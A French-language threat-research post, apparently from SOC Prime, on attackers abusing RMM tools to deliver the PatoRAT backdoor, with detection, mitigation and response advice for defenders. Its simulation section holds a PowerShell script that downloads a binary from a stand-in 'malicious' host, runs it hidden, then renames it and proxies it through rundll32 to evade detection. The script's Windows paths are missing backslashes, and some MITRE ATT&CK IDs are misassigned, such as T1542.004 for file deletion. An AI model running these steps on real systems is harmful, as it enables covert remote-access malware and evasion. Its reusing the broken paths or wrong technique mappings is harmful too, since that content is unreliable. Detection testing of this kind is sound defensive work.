SOC Prime Bias: Critique

28 Jan 2026 08:41 UTC

Détection des Points Terminaux dans les Cas Récents de Distribution RMM

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Suivre
Détection des Points Terminaux dans les Cas Récents de Distribution RMM
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les acteurs menaçants abusent de plus en plus des outils légitimes de surveillance et de gestion à distance (RMM) — tels que LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne et SuperOps — pour distribuer des malwares et établir un accès distant persistant. La livraison initiale se fait souvent par le biais de pages de téléchargement malveillantes ou de courriels de phishing, suivie par une exécution par PowerShell et le déploiement de charges utiles secondaires comme la porte dérobée PatoRAT. AhnLab EDR peut détecter l’exécution de ces utilitaires RMM et générer des alertes comportementales autour des activités suivantes suspectes. Le rapport souligne l’importance de valider la provenance du logiciel et de maintenir une surveillance continue des points de terminaison.

Enquête

AhnLab Security Intelligence Center a observé plusieurs campagnes dans lesquelles les attaquants ont reconditionné ou déguisé les installateurs RMM en tant qu’applications populaires (par exemple, Notepad++, 7-Zip et Telegram) et les ont livrés via des sites Web malveillants ou des pièces jointes de phishing. Après l’installation, les agents RMM sont enregistrés sur l’infrastructure de leur fournisseur et sont ensuite utilisés pour exécuter des charges utiles PowerShell qui déposent PatoRAT. Une tactique similaire est apparue avec plusieurs produits RMM, y compris Syncro, livré par le biais de phishing avec des leurres PDF. La logique de détection AhnLab EDR a été développée pour signaler l’exécution de ces binaires autrement légitimes et la mettre en corrélation avec les comportements post-installation.

Atténuation

Vérifiez les sources de téléchargement, validez les certificats de signature de code et comparez les hachages avec les versions officielles des fournisseurs avant d’autoriser le logiciel RMM dans l’environnement. Appliquez une liste blanche d’applications et exigez des approbations explicites pour l’exécution de RMM. Surveillez les lancements inattendus de binaires RMM, l’activité anormale de PowerShell et les connexions suspectes aux domaines d’infrastructure des fournisseurs lorsque ces outils ne sont pas autorisés. Maintenez les systèmes d’exploitation et les outils de sécurité à jour pour réduire l’exposition.

Réponse

Lorsqu’une exécution suspecte de RMM est détectée, isolez l’hôte, collectez des artefacts forensiques et retirez le binaire non autorisé. Bloquez les connexions sortantes vers l’infrastructure de l’outil pour couper les canaux de contrôle à distance, et effectuez une analyse complète pour les charges utiles secondaires comme PatoRAT. Mettez à jour le contenu de détection avec les IOC observés et informez le SOC sur les motifs de la campagne pour un triage plus rapide.

Flux d’attaque

Exécution de simulation

Prérequis : La vérification préalable de télémétrie et de ligne de base doit avoir réussi.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.

  • Narration de l’attaque et commandes :
    Un attaquant envoie un courriel de phishing contenant une pièce jointe malveillante. La pièce jointe exécute un script PowerShell qui télécharge le binaire RMM LogMeIn.exe to C:Temp. Pour échapper à la détection basée sur le nom, l’attaquant renomme le binaire en tool.exe et le lance via rundll32.exe (T1216). Le binaire RMM contacte ensuite le serveur C2 contrôlé par l’attaquant et déploie une charge utile de porte dérobée. Après l’exécution, l’attaquant supprime le binaire (T1542.004) pour couvrir ses traces.

  • Script de test de régression :

    # ---------------------------------------------------------------
    # Simuler l'exploitation de l'outil RMM (nom original) – devrait déclencher
    # ---------------------------------------------------------------
    $rmmPath = "C:TempLogMeIn.exe"
    Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath
    Write-Host "[*] Exécution du binaire RMM original (atténuation de l'alerte)..."
    Start-Process -FilePath $rmmPath -WindowStyle Hidden
    Start-Sleep -Seconds 10
    
    # ---------------------------------------------------------------
    # Simuler l'évasion par le renommage et l'exécution par proxy – ne devrait PAS déclencher
    # ---------------------------------------------------------------
    $evasionPath = "C:Temptool.exe"
    Rename-Item -Path $rmmPath -NewName "tool.exe"
    Write-Host "[*] Exécution du binaire RMM renommé via rundll32 (évasion)..."
    $rundll = "$env:SystemRootSystem32rundll32.exe"
    Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden
    Start-Sleep -Seconds 10
    
    # ---------------------------------------------------------------
    # Nettoyage après simulation
    # ---------------------------------------------------------------
    Write-Host "[*] Nettoyage des binaires..."
    Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue
    Write-Host "[*] Simulation terminée."
  • Commandes de nettoyage :

    # Assurez-vous que tous les processus restants sont terminés
    Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Supprimez tous les fichiers téléchargés (s'ils existent toujours)
    Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue